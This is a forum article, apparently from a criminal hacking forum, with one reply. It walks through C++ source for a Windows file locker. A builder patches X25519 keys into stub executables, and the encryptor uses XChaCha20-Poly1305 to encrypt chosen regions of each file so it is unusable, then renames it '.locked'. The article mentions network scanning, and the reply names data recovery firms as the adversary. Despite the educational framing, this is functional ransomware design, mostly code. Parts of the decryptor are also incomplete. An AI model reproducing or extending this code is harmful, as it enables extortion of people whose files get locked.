• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Example File Encryptor Break Down for Beginners: X25519-HKDF with XChaCha20-Poly1305 AEAD

Remio

HDD-drive
Пользователь
Регистрация
13.06.2025
Сообщения
42
Реакции
35
Exploring File Encryption with X25519 and XChaCha20-Poly1305
Here we will explore a modern file-encryption design for Windows developed through earlier experiments and articles. This program was made primarily as an educational resource for me to understand these concepts and how they actually work, and will hopefully be useful for beginners too. In the article, we’ll reference to a three-program solution that illustrates the building of the encryptor and decryptor, and the complete encryption and decryption process. The solution consists of three main components:

Builder: Generates a Curve25519 master keypair and patches the keys directly into pre-compiled encryptor and decryptor stubs before writing the executables to disk.
Encryptor: Contains the master public key and encrypts files using ephemeral Curve25519 keypairs combined with XChaCha20-Poly1305 AEAD and the main file encryption logic.
Decryptor: Contains the master private key and reverses the encryption process. It validates file integrity through multiple layers (CRC, Poly1305 MAC).

Github Link: https://github.com/notRemyQ/X25519-XChaCha20-Poly1305-Encryptor-Example

Код:
FileLocker/
├── Builder/
│   ├── builder.cpp                 (Generates master keypair and patches keys into executables)
│   └── curve25519-donna.cpp        (Curve25519 implementation)
├── Encryptor (stub)/
│   ├── Crypto/
│   │   ├── curve25519-donna.cpp    (Key agreement)
│   │   ├── xchacha20.c             (Stream cipher)
│   │   └── poly1305.cpp            (Message authentication)
│   ├── Hash/
│   │   ├── hkdf.cpp                (Key derivation)
│   │   └── sha512.cpp              (Hash function)
│   ├── stub.cpp               (Main encryption logic)
│   └── netscan.cpp                 (Network scanning, not explained here in this article but is not strictly relevant)
└── Decryptor (stub2)/
    ├── Crypto/
    │   ├── curve25519-donna.cpp
    │   ├── xchacha20.c
    │   └── poly1305.cpp
    ├── Hash/
    │   ├── hkdf.cpp
    │   └── sha512.cpp
    ├── stub2.cpp               (Main decryption logic)
    └── netscan.cpp

You'll find I've changed the xchacha20 files slightly to use 8 rounds, this is simply for testing purposes and can be changed back to 20. The complete source code is available at https://github.com/notRemyQ/X25519-XChaCha20-Poly1305-Encryptor-Example.

Classical vs Modern Encryption Systems

When encrypting some file you basically face a fundamental trade-off between two approaches:

Symmetric Encryption: uses the same secret key to both encrypt and decrypt data. It's fast and efficient but has one issue: how do you safely share that key with someone who needs to decrypt the file? If you email it, send it in a message, or store it alongside the encrypted file, an attacker can intercept it and decrypt your data. It can’t really be done.

Asymmetric Encryption: uses two keys: a public key (for encryption) and a private key (for decryption). This solves the key distribution problem because you can freely share your public key without compromising security. However, asymmetric encryption is 100-1000× slower than symmetric encryption simply due to the mathematical complexity involved in the algorithm, making it somewhat impractical for large files or datasets.

To fix this issue, we can combine the convenience of a public-key cryptosystem with the efficiency of a symmetric-key cryptosystem into what’s known as a hybrid cryptosystem. First encrypt the file with a symmetric cipher (such as AES or ChaCha20), and then you encrypt that symmetric key with an asymmetric algorithm (like RSA) so it can be shared securely yet there are a few problems.

Firstly asymmetric operations are slow. Encryption and decryption will take a few milliseconds on typical hardware, with decryption being particularly more intensive. RSA keys are also big (2048-bit keys are 256 bytes, and 4096-bit keys for 512 bytes) compared to ECC keys like (32 bytes). RSA also requires annoying padding schemes like PKCS#1, which are easy to implement incorrectly and have in the past caused some issues. Additionally it doesn't provide any forward secrecy meaning that if a private key is ever compromised, files can potentially be decrypted. These limitations are among the reasons many modern systems Favor ECC.

The Solution: Elliptic-curve Diffie–Hellman Key Agreement

We still use a hybrid model, but instead of encrypting a symmetric key with RSA, we use a key‑agreement protocol that lets both parties independently compute the same shared secret. The process works like this, say we have two people named Alice and Bob that wish to communicate securely:

Both generate a keypair
  • Alice and Bob each generate a public key and a private key so they both have an asymmetric keypair.​
Exchange each others public keys
  • Alice keeps her private key and receives Bob’s public key.​
  • Bob keeps his private key and receives Alice’s public key.​
Each compute a shared secret
  • Alice combines her private key with Bob’s public key to compute a 32‑byte shared secret.​
  • Bob combines his private key with Alice’s public key and gets the same 32‑byte shared secret.​
They both derive encryption keys
  • Both sides feed the shared secret into a key-derivation function to produce symmetric encryption keys used for fast, efficient data encryption so even if an attacker captures a public key, they still cannot derive the shared secret without a private key.​

1_TMlN7FLEJcY9EIBmWQuDUQ.png


The builder will start by generating a master Curve25519 keypair and patches keys directly into the encryptor and decryptor binaries. We then embed the public key is in the encryptor, while the decryptor gets the private key. While this approach has operational advantages (no external key files to manage, self-contained executables), the cryptographic principles work the same regardless of how keys are distributed. The master keypair generation follows the Curve25519 specification via:
C++:
BOOL generateMasterKeys() {
    HCRYPTPROV hProv;

    // First we initialize the Windows crypto provider
    if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return FALSE;
    }

    // Then we can generate 32 random bytes for the private key and apply the clamping requirements
    if (!CryptGenRandom(hProv, 32, master_private)) {
        CryptReleaseContext(hProv, 0);
        return FALSE;
    }

    master_private[0] &= 248;  // Clear the lowest 3 bits (multiple of 8)
    master_private[31] &= 127; // Clear highest bit (< 2^255)
    master_private[31] |= 64;  // Set second highest bit (>= 2^254)

    // Now we derive the public key from private key using scalar multiplication
    curve25519_donna(master_public, master_private, basepoint);

    CryptReleaseContext(hProv, 0);

    return TRUE;
}

CryptAcquireContext initializes the Windows CryptoAPI for CSPRNG access. CryptGenRandom fills master_private with 32 unpredictable bytes. First, CryptAcquireContext initializes the Windows CryptoAPI so we can use the CSPRNG. Then we call CryptGenRandom to fill master_private with 32 unpredictable bytes, the key is then clamped according to Curve25519 spec: clear the lowest three bits, clear the highest bit, and set the second-highest bit. This places the value in a safe range for scalar multiplication. curve25519_donna then derives the public key via scalar multiplication.

C++:
curve25519_donna(master_public, master_private, basepoint);

This multiplies the clamped private key by the Curve25519 basepoint (which is simply the value 9). The result is the public key. This operation is deterministic: given the same private key, you will always get the same public key. However, the reverse operation (computing the private key from the public key) is computationally infeasible (discrete logarithm problem).

Once we have a keypair and the keys are patched, each file is encrypted using a unique ChaCha20 key derived from a fresh ephemeral Curve25519 keypair, rather than the master keypair. The ephemeral private key is destroyed immediately after deriving the symmetric keys, while the ephemeral public key is stored in the file’s metadata to enable decryption. When encrypting a file, the first cryptographic operation generates this ephemeral keypair, which is then used in a key agreement with the master public key to produce a shared secret. From this shared secret, the ChaCha20 encryption key (and Poly1305 authentication key) are derived and used to encrypt the file.
C++:
bool encryptFile(const wchar_t* filepath, HCRYPTPROV hProv) {
    uint8_t ephemeral_private[32] = {0};
    uint8_t ephemeral_public[32] = {0};
    uint8_t shared_secret[32] = {0};
    uint8_t xchacha_key[32] = {0};
    uint8_t poly_key[32] = {0};
    uint8_t nonce[24] = {0};

    // Generate an ephemeral private key
    if (!CryptGenRandom(hProv, 32, ephemeral_private)) {
        return false;
    }

     // Apply Curve25519 clamping (exact same bit operations as master key generation so I'll omit it here)

    // Derive ephemeral public key
    curve25519_donna(ephemeral_public, ephemeral_private, basepoint);
    // Perform X25519 key agreement
    curve25519_donna(shared_secret, ephemeral_private, master_public);

    // etc etc...

    return true;
}

We have four keys in play here: the master public key (embedded in the encryptor, known to everyone), the master private key (embedded in decryptor, kept secret), the ephemeral private key (temporary, exists in memory only and gets erased), and the ephemeral public key (stored in encrypted file, not secret but useless alone). During encryption, we compute shared_secret = ephemeral_private × master_public, and during decryption we compute shared_secret = master_private × ephemeral_public. Due to theproperties of elliptic curve cryptography both operations produce the exact same 32-byte shared secret and the associative property of scalar multiplication: ephemeral_private × (master_private × basepoint) = master_private × (ephemeral_private × basepoint). Both sides compute the same shared secret using different key combinations.

The decryptor performs this key agreement by reading the ephemeral public key from the file's metadata, then multiplying it by the master private key (which is embedded in the decryptor binary):

C++:
bool decryptFile(const wchar_t* filepath) {FileMetadata meta;uint8_t shared_secret[32];uint8_t xchacha_key[32];uint8_t poly_key[32];

// reading and validate metadata is shown later

// Perform X25519 key agreement using master private key
curve25519_donna(shared_secret, master_private, meta.ephemeral_public);

// Now we have the same shared_secret as the encryptor, continue with decryption.
}

Deriving our encryption keys from a shared secret

C++:
// Continuing in our encryptFile function:
uint8_t okm[64];  // Output Key Material

// derive the xchacha keys using HKDF-SHA512
HKDF_SHA512(
    (const uint8_t*)"filecrypto-v2.2", 15,   // salt (15 bytes)
    shared_secret, 32,  // IKM: Input Key Material
    (const uint8_t*)"key-derivation", 14,   // info/context (14 bytes)
    okm, 64  // OKM: Output (64 bytes)
);

// Now we can split the 64 byte output into our two independent keys
memcpy(xchacha_key, okm, 32);   // First 32 bytes for encryption key
memcpy(poly_key, okm + 32, 32);  // Second 32 bytes for auth key

SecureZeroMemory(okm, 64);

Our HKDF takes four inputs:​
  • Input Key Material (IKM) This is our shared secret from the X25519 key agreement. It's cryptographically strong but we need to process it properly before use.​
  • Salt The salt is a fixed string "filecrypto-v2.2". Even though it's not secret and is the same for every file, it serves an important purpose: if two different encryption operations somehow produced the same shared secret (very unlikely with proper CSPRNG), the salt ensures they would still derive different encryption keys. It adds entropy.​
  • Info/Context The info parameter "key-derivation" provides domain separation allowing the same shared secret to be safely used for deriving multiple independent keys for different purposes. E.g. If we later want to derive additional keys from the same shared secret (for example, a key for metadata encryption), we could use a different info string like "metadata-key" and get cryptographically independent output.​
  • Output Key Material (OKM) We request 64 bytes of output, which HKDF-SHA512 generates deterministically from the inputs. These 64 bytes have high entropy and are cryptographically independent from each other.​

The OKM contains both keys, so we erase it as soon as we've extracted what we need. Later, after encryption completes, we'll also erase the individual keys and the shared secret:
C++:
// At the end of encryptFile function

SecureZeroMemory(ephemeral_private, 32);
SecureZeroMemory(shared_secret, 32);
SecureZeroMemory(xchacha_key, 32);
SecureZeroMemory(poly_key, 32);
SecureZeroMemory(nonce, 24);

The decryptor performs identical key derivation. Because it computes the same shared secret (using master_private × ephemeral_public), and uses the same salt and info parameters, HKDF produces the exact same xchacha_key and poly_key:
C++:
// In decryptFile function
uint8_t okm[64];

HKDF_SHA512(
    (const uint8_t*)"filecrypto-v2.2", 15,   // Same salt
    shared_secret, 32,                      // Same shared secret
    (const uint8_t*)"key-derivation", 14,   // Same info
    okm, 64
);

memcpy(xchacha_key, okm, 32);
memcpy(poly_key, okm + 32, 32);

SecureZeroMemory(okm, 64);

XChaCha20-Poly1305

With our derived keys now we can finally encrypt the file using XChaCha20-Poly1305.

XChaCha20 is our stream cipher: it produces a keystream and XORs it with the plaintext to encrypt data. It works the same way as ChaCha20, but it uses a 24‑byte nonce instead of the usual 12‑byte one. The larger nonce space makes it practical to simply generate a random nonce for every file without worrying about collisions.

C++:
// Generate a random 24‑byte nonce
if (!CryptGenRandom(hProv, 24, nonce)) {
    return false;
}

// Set up the cipher
XChaCha_ctx ctx;
xchacha_keysetup(&ctx, xchacha_key, nonce);

// Encrypt in place
xchacha_encrypt_bytes(&ctx, buffer, buffer, size);
The xchacha_keysetup call initializes the internal state with the derived key and nonce. From there, xchacha_encrypt_bytes just XORs the keystream with the buffer:
C++:
// Encryption
xchacha_encrypt_bytes(&ctx, plaintext, ciphertext, size);

// Decryption operation is the same
xchacha_decrypt_bytes(&ctx, ciphertext, plaintext, size);

Poly1305 is a Message Authentication Code (MAC) that proves the ciphertext hasn't been tampered with. After encrypting the entire file, we compute a Poly1305 tag over all the ciphertext using our separate authentication key:
C++:
BOOL ComputePoly1305MAC(HANDLE hFile, LONGLONG fileSize, uint8_t* poly_key, uint8_t* tag) {
    poly1305_context ctx;
    poly1305_init(&ctx, poly_key);

    // allocate a buffer for file streaming
    LPBYTE buffer = (LPBYTE)malloc(BufferSize);
    if (!buffer) return FALSE;

    // Seek to start of file
    LARGE_INTEGER offset;
    offset.QuadPart = 0;
    SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);

    // Stream through the file, updating MAC
    LONGLONG remaining = fileSize;
    while (remaining > 0) {
        DWORD toRead = (remaining > BufferSize) ? BufferSize : (DWORD)remaining;

        if (!ReadFullData(hFile, buffer, toRead)) {
            free(buffer);
            return FALSE;
        }

        poly1305_update(&ctx, buffer, toRead);
        remaining -= toRead;
    }

    // Finalize the MAC computation
    poly1305_finish(&ctx, tag); // Produces 16-byte tag

    free(buffer);
    return TRUE;
}

The poly1305_init function sets up the MAC context with our authentication key. We then stream through the encrypted file in chunks calling poly1305_update for each chunk. This accumulates the MAC calculation without loading the entire file into memory. Finally, poly1305_finish completes the computation and writes the 16-byte authentication tag which is stored in the file metadata. During decryption, we recompute the tag over the ciphertext and compare:
C++:
BOOL VerifyPoly1305MAC(HANDLE hFile, LONGLONG fileSize, uint8_t* poly_key, const uint8_t* expected_tag) {
    poly1305_context ctx;
    poly1305_init(&ctx, poly_key);

    LPBYTE buffer = (LPBYTE)malloc(BufferSize);
    if (!buffer) return FALSE;

    LARGE_INTEGER offset;
    offset.QuadPart = 0;
    SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN);
    LONGLONG remaining = fileSize;

    while (remaining > 0) {
        DWORD toRead = (remaining > BufferSize) ? BufferSize : (DWORD)remaining;

        if (!ReadFullData(hFile, buffer, toRead)) {
            free(buffer);
            return FALSE;
        }

        poly1305_update(&ctx, buffer, toRead);
        remaining -= toRead;
    }

    // Compute the tag
    uint8_t computed_tag[16];
    poly1305_finish(&ctx, computed_tag);

    // Constant-time comparison
    BOOL valid = poly1305_verify(computed_tag, expected_tag);

    free(buffer);
    return valid;
}

Some security notes, the poly1305_verify function performs constant-time comparison of the two tags. If they don't match (even a single bit), the file has been tampered with or corrupted, and decryption aborts immediately to prevent chosen-ciphertext attacks. The constant-time comparison is necessary to prevent timing attacks. The encrypt-then-MAC construction is critical because it verifies the Poly1305 tag before decryption. If verification fails, abort without touching the ciphertext. TLS 1.3 and WireGuard use this same approach.

File Metadata Structure and Validation

Each encrypted file gets a 110-byte metadata structure appended at the end:
C++:
#pragma pack(push, 1)
struct FileMetadata {
    uint32_t version;
    uint8_t ephemeral_public[32];
    uint8_t nonce[24];
    uint8_t encryption_mode;
    uint64_t original_size;
    uint8_t poly1305_tag[16];
    uint32_t metadata_checksum;
};
#pragma pack(pop) //eliminates structure padding, ensures the metadata occupies exactly 110 bytes with no gaps between fields - essential for reliable serialization.

Each section here serves a specific purpose:​
  • version (4 bytes): is our program version identifier. This just allows future cryptographic upgrades while maintaining backward compatibility. If we later switch to a different cipher or key agreement protocol, older decryptors can recognize files they can't handle.​
  • ephemeral_public (32 bytes): The ephemeral public key generated during encryption. Our decryptor needs this to derive the shared secret using its master private key.​
  • nonce (24 bytes): The 192-bit random value used with XChaCha20. Nonces don't need to be secret, but they MUST be unique for each encryption operation with the same key.​
  • encryption_mode (1 byte): Indicates which portions of the file were encrypted (full, header-only, or partial), allowing the decryptor to apply the correct decryption pattern.​
  • original_size (8 bytes): The file size before encryption, used to validate the encrypted file's integrity and truncate it back to original size after removing metadata.​
  • poly1305_tag (16 bytes): The Poly1305 MAC computed over the encrypted file contents. This is what prevents tampering;​
  • metadata_checksum (4 bytes): A simple CRC over the metadata itself it enables rapid detection of metadata corruption before expensive cryptographic operations.​
Before attempting decryption we need to validates the metadata:
C++:
BOOL ValidateMetadata(const FileMetadata* meta, LONGLONG encryptedFileSize) {
    // Version check
    if (meta->version != CRYPTO_VERSION) {
        return FALSE;
    }

    // Size sanity checks
    if (meta->original_size == 0) {
        return FALSE;
    }

    if (meta->original_size > (UINT64_MAX - sizeof(FileMetadata))) {
        return FALSE;
    }
    // Verify file size matches metadata claim
    if ((LONGLONG)(meta->original_size + sizeof(FileMetadata)) != encryptedFileSize) {
        return FALSE;
    }

    // Encryption mode validation
    if (meta->encryption_mode < MODE_FULL || meta->encryption_mode > MODE_PARTIAL_20) {
        return FALSE;
    }

    // Verify encryption mode matches file size
    if (meta->original_size <= 1048576) {
        if (meta->encryption_mode != MODE_FULL) return FALSE;
    } else if (meta->original_size <= 5242880) {
        if (meta->encryption_mode != MODE_HEADER) return FALSE;
    } else if (meta->original_size <= 52428800) {
        if (meta->encryption_mode != MODE_PARTIAL_50) return FALSE;
    } else {
        if (meta->encryption_mode != MODE_PARTIAL_20) return FALSE;
    }

    // CRC verification
    uint32_t crc = 0;
    for (size_t i = 0; i < sizeof(FileMetadata) - sizeof(uint32_t); i++) {
        crc = (crc << 8) ^ ((uint8_t*)meta)[i];
    }

    if (crc != meta->metadata_checksum) {
        return FALSE;
    }

    return TRUE;
}

For validation we go through multiple independent checks:​
  • Version Check: Prevents attempting to decrypt files with incompatible cryptographic schemes.​
  • Size Consistency: Ensures the declared original size matches the actual encrypted file size (accounting for the 110-byte metadata overhead). This catches truncated or corrupted files early.​
  • Encryption Mode Validation: Verifies consistency between file size and the encryption strategy claimed in the metadata. This prevents attacks where an adversary modifies the metadata to trick the decryptor into using an incorrect decryption pattern.​
  • CRC Checksum: Provides fast metadata integrity verification before expensive cryptographic operations. While not especially cryptographically strong, the CRC will quickly detect corruption from file transfer errors or storage failures.​
During decryption, the metadata location is predictable (always the last 110 bytes), so we can seek directly to it:
C++:
// Read metadata from the end of the file
LARGE_INTEGER fileSizeLI;
GetFileSizeEx(hFile, &fileSizeLI);
LONGLONG totalSize = fileSizeLI.QuadPart;

FileMetadata meta;
LARGE_INTEGER metaOffset;
metaOffset.QuadPart = totalSize - sizeof(FileMetadata);

SetFilePointerEx(hFile, metaOffset, NULL, FILE_BEGIN);  // move file pointer to metadata position

// now read the metadata
DWORD bytesRead;
ReadFile(hFile, &meta, sizeof(meta), &bytesRead, NULL);

This allows reading and validating metadata without traversing the entire file first. Before we now discuss dynamic encryption it's worth noting that the metadata-at-end design has an interesting side effect: if an encrypted file is truncated during transfer (common on unreliable networks), the metadata remains intact. The CRC check will detect the truncation immediately without requiring expensive MAC computation over a potentially large file. Note this isn't an actual design goal, but came naturally from placing metadata last.

Dynamic Encryption Techniques
Why encrypt the entire file? For a big data set for example, encrypting every byte takes time. But if we only encrypt strategic portions, enough to render the file useless, this is much faster. Rather than encrypting every byte of every file we can just strategic portions that render the file completely unusable while processing it much faster.

The strategy selection is deterministic and much the same as I use in previous articles:
C++:
enum EncryptionMode {
    MODE_FULL = 1,  // Encrypt entire file
    MODE_HEADER = 2,  // Encrypt the first 1MB only
    MODE_PARTIAL_50 = 3, // Encrypt 5×10% chunks
    MODE_PARTIAL_20 = 4  // Encrypt 3 ×10% chunks
};

EncryptionMode mode;
if (fileSize <= 1048576)    // <=1MB
    mode = MODE_FULL;
else if (fileSize <= 5242880)  // <= 5MB
    mode = MODE_HEADER;
else if (fileSize <= 52428800)  //<= 50MB
    mode = MODE_PARTIAL_50;
else   // > 50MB
    mode = MODE_PARTIAL_20;
  • MODE_FULL encrypts the entire file and is used for files under 1MB. Since these files are already small (documents, images, configuration files), the performance cost is negligible, and full encryption provides maximum security.​
  • MODE_HEADER encrypts only the first 1MB of medium files (1-5MB). Many file formats store metadata in their headers: databases have schema information, media files have codec data, compressed archives have file indexes. Corrupting just the header renders these files completely unopenable.​
  • MODE_PARTIAL_50 applies to files between 5MB and 50MB, encrypting five separate 10% chunks distributed evenly across the file.​
  • MODE_PARTIAL_20 handles very large files (over 50MB) by encrypting only three 10% chunks (30% total). For a 1GB file, this means processing 300MB instead of the entire gigabyte (3× faster), yet the file is thoroughly corrupted.​
The region calculation for partial modes:
C++:
BOOL CalculateRegions(LONGLONG fileSize, EncryptionMode mode,
                      EncryptionRegion* regions, int* regionCount) {
    *regionCount = 0;

    switch (mode) {
        case MODE_FULL:
            regions[0].start = 0;
            regions[0].size = fileSize;
            *regionCount = 1;
            return TRUE;

        case MODE_HEADER:
            regions[0].start = 0;
            regions[0].size = min(1048576LL, fileSize); // encrypt up to 1 MB
            *regionCount = 1;
            return TRUE;

        case MODE_PARTIAL_50: {
            LONGLONG partSize = (fileSize * 10) / 100; // 10% chunks
            LONGLONG stepSize = partSize; // Equal spacing

            for (int i = 0; i < 5; i++) {
                LONGLONG start = i * (partSize + stepSize);
                if (start >= fileSize) break;

                regions[i].start = start;
                regions[i].size = min(partSize, fileSize - start);
                (*regionCount)++;
            }
            return (*regionCount > 0);
        }

        case MODE_PARTIAL_20: {
            LONGLONG partSize = (fileSize * 10) / 100; // 10% chunks
            LONGLONG totalParts = partSize * 3;  // 30% of  total

            if (totalParts >= fileSize) {
                // File too small for spacing, encrypt it all
                regions[0].start = 0;
                regions[0].size = fileSize;
                *regionCount = 1;
                return TRUE;
            }
            LONGLONG stepSize = (fileSize - totalParts) / 2; // Distribute the  3 chunks the across file

            for (int i = 0; i < 3; i++) {
                LONGLONG start = (i == 0) ? 0 : (partSize + stepSize) * i;
                if (start >= fileSize) break;

                regions[i].start = start;
                regions[i].size = min(partSize, fileSize - start);
                (*regionCount)++;
            }
            return (*regionCount > 0);


        }
    }
    return FALSE;
}

For MODE_PARTIAL_50, the algorithm creates five regions of 10% each with equal spacing. This distributes encryption evenly: beginning, early-middle, center, late-middle, and end. Regardless of where useful data is located, some portion will be encrypted.

Each calculated region is then encrypted independently:

C++:
BOOL EncryptRegion(HANDLE hFile, LPBYTE Buffer, XChaCha_ctx* ctx,
                   LONGLONG startPos, LONGLONG regionSize) {
    if (regionSize <= 0) return FALSE;

    // Seek to region start
    LARGE_INTEGER offset;
    offset.QuadPart = startPos;
    if (!SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN)) {
        return FALSE;
    }

    LONGLONG totalProcessed = 0;

    while (totalProcessed < regionSize) {
        DWORD chunkSize = (regionSize - totalProcessed > BufferSize) ?
                          BufferSize : (DWORD)(regionSize - totalProcessed);

        // Read plaintext chunk
        if (!ReadFullData(hFile, Buffer, chunkSize)) {
            return FALSE;
        }

        xchacha_encrypt_bytes(ctx, Buffer, Buffer, chunkSize); // Encrypt in-place

        // Write ciphertext back to same position
        offset.QuadPart = startPos + totalProcessed;
        if (!SetFilePointerEx(hFile, offset, NULL, FILE_BEGIN)) {
            return FALSE;
        }

        if (!WriteFullData(hFile, Buffer, chunkSize)) {
            return FALSE;
        }

        totalProcessed += chunkSize;
    }

    return TRUE;
}

All regions use the same XChaCha20 contextwhich maintains stream cipher state

C++:
BOOL EncryptFileRegions(HANDLE hFile, LPBYTE Buffer, uint8_t* key, uint8_t* nonce,
                        EncryptionRegion* regions, int regionCount) {
    // Single context for all regions
    XChaCha_ctx ctx;
    xchacha_keysetup(&ctx, key, nonce);

    // Encrypt each region with the same context
    for (int i = 0; i < regionCount; i++) {
        if (!EncryptRegion(hFile, Buffer, &ctx, regions[i].start, regions[i].size)) {
            SecureZeroMemory(&ctx, sizeof(ctx));
            return FALSE;
        }
    }

    SecureZeroMemory(&ctx, sizeof(ctx));
    return TRUE;
}

The takeaway here is that partial encryption doesn't reduce the cryptographic strength of what is encrypted. Those portions are just as secure as full file encryption. What changes is the completeness of data destruction. File carving tools may be able to recover some unencrypted portions, depending on the type of files. However, in practical scenarios, partial encryption achieves the same operational impact as full encryption. A database with an encrypted header cannot be opened, a video file with encrypted chunks cannot be played and an archive with encrypted portions cannot be extracted. The file is effectively destroyed from a usability perspective, while encryption speed is dramatically improved.

The Poly1305 MAC is computed over the entire file (both encrypted and unencrypted regions), ensuring that an attacker cannot modify even the unencrypted portions without detection.

Complete Encryption Process

C++:
bool encryptFile(const wchar_t* filepath, HCRYPTPROV hProv) {
    // Step 1: Initialize all cryptographic material
    uint8_t ephemeral_private[32] = {0};
    uint8_t ephemeral_public[32] = {0};
    uint8_t shared_secret[32] = {0};
    uint8_t xchacha_key[32] = {0};
    uint8_t poly_key[32] = {0};
    uint8_t nonce[24] = {0};

    // Generate ephemeral keypair
    if (!CryptGenRandom(hProv, 32, ephemeral_private)) {
        return false;
    }

    // Clamp the keys (shown earlier)

    // Derive ephemeral public key
    curve25519_donna(ephemeral_public, ephemeral_private, basepoint);

    //Perform the X25519 key agreement
    curve25519_donna(shared_secret, ephemeral_private, master_public);

    //Derive encryption and authentication keys, extract(shared_secret, salt) + Expand(info) > enc_key || auth_key
    uint8_t okm[64];
    HKDF_SHA512((const uint8_t*)"filecrypto-v2.2", 15,
                shared_secret, 32,
                (const uint8_t*)"key-derivation", 14,
                okm, 64);
    memcpy(xchacha_key, okm, 32);
    memcpy(poly_key, okm + 32, 32);
    SecureZeroMemory(okm, 64);

    // Generate random nonce
    if (!CryptGenRandom(hProv, 24, nonce)) {
        SecureZeroMemory(ephemeral_private, 32);
        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(xchacha_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }

    HANDLE hFile = CreateFileW(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return false;
    }

    // Get the file size
    LARGE_INTEGER fileSizeLI;
    GetFileSizeEx(hFile, &fileSizeLI);
    LONGLONG fileSize = fileSizeLI.QuadPart;

    LPBYTE buffer = (LPBYTE)malloc(BufferSize);

    // Determine encryption mode
    EncryptionMode mode;
    if (fileSize <= 1048576) mode = MODE_FULL;
    else if (fileSize <= 5242880) mode = MODE_HEADER;
    else if (fileSize <= 52428800) mode = MODE_PARTIAL_50;
    else mode = MODE_PARTIAL_20;

    // calculate the regions to encrypt
    EncryptionRegion regions[10];
    int regionCount = 0;
    CalculateRegions(fileSize, mode, regions, &regionCount);

    // Encrypt the regions
    BOOL success = EncryptFileRegions(hFile, buffer, xchacha_key, nonce,
                                      regions, regionCount);

    //  Compute Poly1305 MAC
    FileMetadata meta = {0};
    ComputePoly1305MAC(hFile, fileSize, poly_key, meta.poly1305_tag);

    // Fill out the metadata structure
    meta.version = CRYPTO_VERSION;
    memcpy(meta.ephemeral_public, ephemeral_public, 32);
    memcpy(meta.nonce, nonce, 24);
    meta.encryption_mode = (uint8_t)mode;
    meta.original_size = (uint64_t)fileSize;

    // Calculate metadata CRC
    uint32_t crc = 0;
    for (size_t i = 0; i < sizeof(FileMetadata) - sizeof(uint32_t); i++) {
        crc = (crc << 8) ^ ((uint8_t*)&meta)[i];
    }
    meta.metadata_checksum = crc;

    // Append metadata to file
    LARGE_INTEGER endPos;
    endPos.QuadPart = 0;
    SetFilePointerEx(hFile, endPos, NULL, FILE_END);
    DWORD bytesWritten;
    WriteFile(hFile, &meta, sizeof(meta), &bytesWritten, NULL);

    CloseHandle(hFile);

    wchar_t newPath[MAX_PATH];
    wcscpy_s(newPath, MAX_PATH, filepath);
    wcscat_s(newPath, MAX_PATH, L".locked"); // add the custom extension
    MoveFileW(filepath, newPath);

    SecureZeroMemory(ephemeral_private, 32);
    SecureZeroMemory(shared_secret, 32);
    SecureZeroMemory(xchacha_key, 32);
    SecureZeroMemory(poly_key, 32);
    SecureZeroMemory(nonce, 24);

    free(buffer);

    return true;
}

The decryption workflow basically mirrors this process but in reverse and uses authentication verification as a critical gate:
C++:
bool decryptFile(const wchar_t* filepath) {
    // 1: Open the encrypted file
    HANDLE hFile = CreateFileW(filepath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return false;
    }


    LARGE_INTEGER fileSizeLI;  // Read file size
    GetFileSizeEx(hFile, &fileSizeLI);
    LONGLONG encryptedSize = fileSizeLI.QuadPart;

    // Read the metadata from end of file
    FileMetadata meta;
    LARGE_INTEGER metaOffset;
    metaOffset.QuadPart = encryptedSize - sizeof(FileMetadata);
    SetFilePointerEx(hFile, metaOffset, NULL, FILE_BEGIN);
    DWORD bytesRead;
    ReadFile(hFile, &meta, sizeof(meta), &bytesRead, NULL);

    // Validate metadata
    if (!ValidateMetadata(&meta, encryptedSize)) {
        CloseHandle(hFile);
        return false;
    }

    // Perform X25519 key agreement using master private key
    uint8_t shared_secret[32];
    curve25519_donna(shared_secret, master_private, meta.ephemeral_public);

    // Derive encryption and authentication keys (same HKDF as encryption)

    //verify Poly1305 MAC BEFORE decryption
    if (!VerifyPoly1305MAC(hFile, meta.original_size, poly_key, meta.poly1305_tag)) {
        // MAC verification failed - file has been tampered with or corrupted
        CloseHandle(hFile);
     // if it fails, we immediately abort without touching the ciphertext. This prevents chosen-ciphertext attacks

        SecureZeroMemory(shared_secret, 32);
        SecureZeroMemory(xchacha_key, 32);
        SecureZeroMemory(poly_key, 32);
        return false;
    }

    // Calculate decryption regions
    EncryptionRegion regions[10];
    int regionCount = 0;
    CalculateRegions(meta.original_size, (EncryptionMode)meta.encryption_mode,
                     regions, &regionCount);

    LPBYTE buffer = (LPBYTE)malloc(BufferSize);

    // Decrypt the regions
    BOOL success = EncryptFileRegions(hFile, buffer, xchacha_key, meta.nonce,
                                      regions, regionCount);

    LARGE_INTEGER newSize;
    newSize.QuadPart = meta.original_size;
    SetFilePointerEx(hFile, newSize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);

    CloseHandle(hFile);

    // Remove extension
    wchar_t newPath[MAX_PATH];
    wcscpy_s(newPath, MAX_PATH, filepath);
    size_t len = wcslen(newPath);
    if (len > 7 && wcscmp(newPath + len - 7, L".locked") == 0) {
        newPath[len - 7] = L'\0';
        MoveFileW(filepath, newPath);
    }

    SecureZeroMemory(shared_secret, 32);
    SecureZeroMemory(xchacha_key, 32);
    SecureZeroMemory(poly_key, 32);

    free(buffer);
    return true;
}
}

Further Readings

As with any program, it is best to set up a sandbox or virtual machine and experiment with the code yourself since there is too much to cover in one place. I try and focused on the concepts that are most important to understanding the encryption design, so I hope you found it useful and interesting, especially if these ideas were new to you.
Some resources to explore the concepts further below:
 
Последнее редактирование:
I never understood why some compute a MAC for each file. The cryptographic threat model is different here, CCA's require a decryption oracle to gain any information. If an attacker (here, a data recovery company) were in this position, they'd already have the decryptor with the private key embedded :P This is just extra processing power being wasted when efficiency is critical.

Props on using ECC however. Way faster than basically all RSA key sizes that most people use. Is there a noticeable speed difference considering HKDF tends to be pretty slow?
 


